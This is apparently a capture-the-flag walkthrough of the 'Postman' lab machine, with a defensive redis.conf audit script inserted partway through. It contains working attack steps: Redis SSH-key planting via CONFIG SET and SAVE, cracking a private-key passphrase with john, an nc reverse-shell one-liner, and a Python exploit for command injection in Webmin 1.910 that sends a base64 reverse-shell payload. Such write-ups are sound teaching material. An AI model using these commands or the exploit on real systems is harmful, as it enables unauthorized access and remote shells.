Postman

Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.

The following nmap command scans the entire port range quickly and saves the output to a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.160 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, the fastest of nmap's timing templates.

  • -Pn skip host discovery and treat the host as online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result to a file, in this case the allPorts file.

# Nmap 7.92 scan initiated Wed Jan  5 15:30:55 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.160
Warning: 10.10.10.160 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.160
Host is up (0.068s latency).
Not shown: 64699 closed tcp ports (reset), 832 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
6379/tcp  open  redis
10000/tcp open  snet-sensor-mgmt

# Nmap done at Wed Jan  5 15:31:15 2022 -- 1 IP address (1 host up) scanned in 20.29 seconds

As we see, a few ports are open.

Let's try to obtain the services and versions running on these ports. The following command scans these ports in more depth and saves the result to a file:

nmap -sC -sV -p22,80,6379,10000 10.10.10.160 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result to a file, in this case the targeted file.

# Nmap 7.92 scan initiated Wed Jan  5 15:32:05 2022 as: nmap -p22,80,6379,10000 -sCV -oN targeted 10.10.10.160
Nmap scan report for 10.10.10.160
Host is up (0.038s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan  5 15:32:43 2022 -- 1 IP address (1 host up) scanned in 37.85 seconds

We have an SSH server, a website, a Redis server, and a Webmin httpd server. I anticipate that you will not find anything interesting on the website. And if you search for a Webmin 1.910 exploit on exploit-db, you'll see there is one exploit, but we have to be authenticated, so let's save that for later.

Exploitation

So let's investigate the Redis server. By doing your own research, you'll find an article explaining that we could get RCE (Remote Code Execution) via SSH. The idea is to create a pair of SSH keys locally and add the public key to the authorized_keys file on the victim's machine, so we can later log in with our private key.

First, let's create the SSH keys with no passphrase.

ssh-keygen -t rsa

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:qUhqKb24Xashwf6FZut9CBemPGaBKuKXuffwVVhYS98 root@alfa8sa-virtualbox
The key's randomart image is:
+---[RSA 3072]----+
|           o     |
|          + o .  |
|  .      . o . E |
|.. . o   .o      |
|o.. = . S. .     |
|=o @.o .  .      |
|*.O+Ooo  .       |
| B+B++o..        |
|o.**+.oo         |
+----[SHA256]-----+

Then we pad the public key with a few newlines at the beginning and at the end (the RDB dump Redis writes wraps the value in binary header and footer bytes, so the padding keeps the key on its own line) and save it to a file.

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt

Then we load the file into the Redis server as the value of a key.

cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set ssh_key

Finally, let's connect to the Redis server, point its dump directory at the redis user's .ssh directory, set the dump filename to authorized_keys, and trigger a save so the database (containing our key) is written there.

redis-cli -h 10.10.10.160

10.10.10.160:6379> config set dir /var/lib/redis/.ssh

10.10.10.160:6379> config set dbfilename "authorized_keys"

10.10.10.160:6379> save

Then, all we have to do is connect via SSH with the user redis and our private key.

ssh -i ~/.ssh/id_rsa redis@10.10.10.160

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ whoami
redis
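A defender-side check for the weakness the steps above rely on, added here as an example and not part of the original write-up: it audits a redis.conf for the settings that let an unauthenticated client redirect SAVE into an arbitrary directory and filename, with a constructed weak config beside a hardened one (both snippets are constructed samples, not files from the box).

```python
"""Audit a redis.conf for the settings that make the SSH-key-via-SAVE trick
possible. Added example, not part of the original write-up; the two config
snippets are constructed samples, not files from the Postman box."""

# Constructed: a config that lets any network client run CONFIG SET dir/dbfilename + SAVE.
WEAK_CONF = """
# no requirepass, no bind restriction
protected-mode no
dir /var/lib/redis
"""

# Constructed: the same service locked down against that sequence.
HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
dir /var/lib/redis
"""

def parse_conf(conf: str) -> dict[str, list[str]]:
    """Map each directive (lowercased) to the list of values it was given."""
    opts: dict[str, list[str]] = {}
    for raw in conf.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        opts.setdefault(key.lower(), []).append(value.strip())
    return opts

def audit_redis_conf(conf: str) -> list[str]:
    """Return one finding per weakness that enables redirecting SAVE output."""
    opts = parse_conf(conf)
    findings = []
    if "requirepass" not in opts:
        findings.append("no requirepass: unauthenticated clients may run CONFIG SET")
    binds = opts.get("bind")
    if binds is None:
        findings.append("no bind directive: Redis listens on every interface")
    elif any(ip in ("0.0.0.0", "::", "*") for b in binds for ip in b.split()):
        findings.append("bind exposes Redis on all interfaces")
    if opts.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode is off")
    renamed = {v.split()[0].upper() for v in opts.get("rename-command", []) if v}
    if "CONFIG" not in renamed:
        findings.append("CONFIG not renamed/disabled: dir and dbfilename can be changed at runtime")
    return findings
```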

Privilege Escalation

At this point, I started enumerating the machine, and I found a backup file of an SSH private key owned by the Matt user.

ls -l /opt/

total 4
-rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 id_rsa.bak

Let's copy it to our local machine and give it the right permissions.

nano id_rsa.bak

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
[encrypted key body omitted]
-----END RSA PRIVATE KEY-----

chmod 600 id_rsa.bak

Now let's log in with it via SSH.

ssh -i id_rsa.bak Matt@10.10.10.160

Enter passphrase for key 'id_rsa.bak':

It asks for a passphrase, but we don't have one. One thing we can do is crack the passphrase of the private key with john. First, let's convert the private key into a format that john understands with ssh2john.

python3 /usr/share/john/ssh2john.py id_rsa.bak > hash

Then crack it with john.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa.bak)
1g 0:00:00:24 DONE (2022-02-08 15:38) 0.04086g/s 586093p/s 586093c/s 586093C/sa6_123..*7¡Vamos!
Session completed

Now that we've got the passphrase, let's log in again via SSH.

ssh -i id_rsa.bak Matt@10.10.10.160

Enter passphrase for key 'id_rsa.bak': computer2008
Connection closed by 10.10.10.160 port 22

We got rejected, but no worries: let's go back to the shell we already have and switch to the user Matt, trying the passphrase as his password.

su Matt

Password: computer2008
Matt@Postman:/var/lib/redis$ whoami
Matt
Matt@Postman:/var/lib/redis$ cat /home/Matt/user.txt 
51ddda4a2897104427291e1df7aac984

At this point I couldn't find any way to become the root user, but I remembered the Webmin I found earlier, which needed valid credentials.

As the exploit is meant to be used with Metasploit, and I don't like using Metasploit, I coded my own script. What the script basically does is log in to Webmin as the user Matt, send a POST request to a specific URL with a payload which sends back a reverse shell, and finally I used the pwn library to catch the reverse shell.

If you use this script, make sure you replace the base64-encoded payload with one containing your own IP address:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip 5555 >/tmp/f" | base64

#!/usr/bin/env python3

from pwn import *
import html
import re
import requests
import signal
import sys
import threading
import urllib3

def def_handler(sig, frame):
    print("\n[!] Exiting...\n")
    sys.exit(1)

# Ctrl+C
signal.signal(signal.SIGINT, def_handler)

# Global variables
login_url = "https://10.10.10.160:10000/session_login.cgi"
package_updates_url = "https://10.10.10.160:10000/package-updates/update.cgi"
burp = {'https': 'http://127.0.0.1:8080'} # Proxy; pass proxies=burp to the requests to inspect the traffic
lport = 5555

def makeRequest():
    urllib3.disable_warnings() # Webmin serves a self-signed certificate
    s = requests.session()
    s.verify = False

    # Log in to Webmin as Matt; the session cookie is kept in s
    post_data = {
        'page': "",
        "user": "Matt",
        "pass": "computer2008"
    }
    headers = {
        'cookie': "testing=1"
    }

    r = s.post(login_url, post_data, headers=headers)

    # The second 'u' value is appended to the package update command.
    # Replace the base64 blob with one that contains your own IP address.
    post_data = [
        ('u', 'acl/apt'),
        ('u', ' | bash -c "echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTQuMTkgNTU1NSA+L3RtcC9mCg== | base64 -d | sh"'),
        ('ok_top', 'Update+Selected+Packages')
    ]
    headers = {
        "Referer": "https://10.10.10.160:10000"
    }
    r = s.post(package_updates_url, post_data, headers=headers)

    # Webmin echoes the command output inside <pre> tags; show it if present
    matches = re.findall(r'<pre>(.*?)</pre>', r.text, re.DOTALL)
    if matches:
        log.info(html.unescape(matches[0]).strip())

if __name__ == '__main__':

    # Send the request in a thread so the listener below is ready for the callback
    try:
        threading.Thread(target=makeRequest, args=()).start()
    except Exception as e:
        log.error(str(e))

    shell = listen(lport, timeout=20).wait_for_connection()

    shell.interactive()

If we run the script, we can finally reap the harvest and take the root flag.

python3 exploit.py

[+] Trying to bind to :: on port 5555: Done
[+] Waiting for connections on :::5555: Got connection from ::ffff:10.10.10.160 on port 54600
[*] Switching to interactive mode
/bin/sh: 0: can't access tty; job control turned off
# $ whoami
root
# $ cat /root/root.txt
c55da24af37f7d18824bbb5d9ccc70da
